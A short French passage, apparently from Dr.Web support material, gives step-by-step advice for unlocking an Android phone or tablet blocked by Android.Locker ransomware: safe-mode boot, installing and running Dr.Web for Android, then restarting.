  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android